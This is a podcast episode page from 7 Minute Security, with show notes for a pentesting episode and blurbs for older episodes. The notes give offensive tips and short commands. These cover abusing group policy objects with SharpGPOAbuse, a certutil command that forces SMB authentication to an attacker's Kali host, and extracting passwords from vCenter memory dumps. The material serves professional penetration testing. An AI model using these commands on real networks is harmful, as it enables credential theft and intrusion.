7MS #632: Tales of Pentest Pwnage – Part 59
7 Minute Security12 Heinä 2024

7MS #632: Tales of Pentest Pwnage – Part 59

Today’s tale of pentest pwnage includes some fun stuff, including:

    • SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder.
    • I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under.
    • DonPAPI got an upgrade recently with a focus on evasion!
    • When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps.
    • Can’t RDP into a victim system that you’re PSRemote’d into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber`

And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!

Jaksot(681)

7MS #88: Glasswire

7MS #88: Glasswire

This episode's about a cool security app called GlassWire, which is (kind of) a firewall on steroids. I love it! Oh, and this is not an endorsement or a commercial :-)

25 Elo 20156min

7MS #87: Presenting the Right Findings to the Right Audience

7MS #87: Presenting the Right Findings to the Right Audience

Today I talk about challenge I run into when I'm delivering to a mixed audience of C-level folks and IT people. How do you keep things high level enough so everybody "gets it" but also go level enough that the recommendations have some teeth?

20 Elo 20157min

7MS #86: OSWP-The Final Chapter!

7MS #86: OSWP-The Final Chapter!

This episode concludes the gripping, thrilling, exciting, awesome-ing, death-defying, unsettling, rattling series on OSWP (Offensive Security Wireless Professional). Specifically, I talk (as much as I can without getting into trouble) about the exam and give you some pointers to pass it!

18 Elo 20157min

7MS #85: What is The Penetration Testers Framework (PTF)?

7MS #85: What is The Penetration Testers Framework (PTF)?

Need an easy way to create a modular/mobile kit of pentest tools to take with you from machine to machine? And ALSO be able to update all those modules in one command? Then check out the PTF! That's what we're talkin' about on today's podcast.

14 Elo 20157min

7MS #84: DIY Pwn Pad

7MS #84: DIY Pwn Pad

Hey have you heard of Pwn Pads? They're an awesome network pentesting tool that leverages a Nexus tablet - which you can either buy right from Pwnie Express, or create your own if you have a certain model of Nexus lying around. I just happened to have the right Nexus model around, so this podcast episode chronicles my trial and error (mostly error) in making a DIY Pwn Pad! P.S. to get the Android tools installed on Ubuntu 14.04, run these commands: -- sudo add-apt-repository ppa:nilarimogard/webupd8 sudo apt-get update sudo apt-get install android-tools-adb android-tools-fastboot --

12 Elo 20157min

7MS #83: Wifi Pineapple First Impressions

7MS #83: Wifi Pineapple First Impressions

in this episode I talk about my first hands-on experience with a Wifi Pineapple, and why you'll probably want one too.

6 Elo 20158min

7MS #82: OSWP-Part 3

7MS #82: OSWP-Part 3

The OSWP series is coming to a close. One final episode today and then the four-quel episode will be all about the test!

4 Elo 20157min

7MS #81: OSWP-Part 2

7MS #81: OSWP-Part 2

A continuation of our thrilling, exciting, mind-blowing series on OSWP (Offensive Security Wireless Professional)!

30 Heinä 20158min

Suosittua kategoriassa Politiikka ja uutiset

rss-podme-livebox
ootsa-kuullut-tasta-2
aikalisa
politiikan-puskaradio
otetaan-yhdet
et-sa-noin-voi-sanoo-esittaa
rss-vaalirankkurit-podcast
rikosmyytit
aihe
rss-mina-ukkola
rss-raha-talous-ja-politiikka
rss-hyvaa-huomenta-bryssel
rss-kyselytunti
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
politbyroo
the-ulkopolitist
rss-suoraan-asiaan
rss-kaikki-paskaksi-ystavat
rss-kaikki-uusiksi
rss-tyolinjalla-pekka-sauri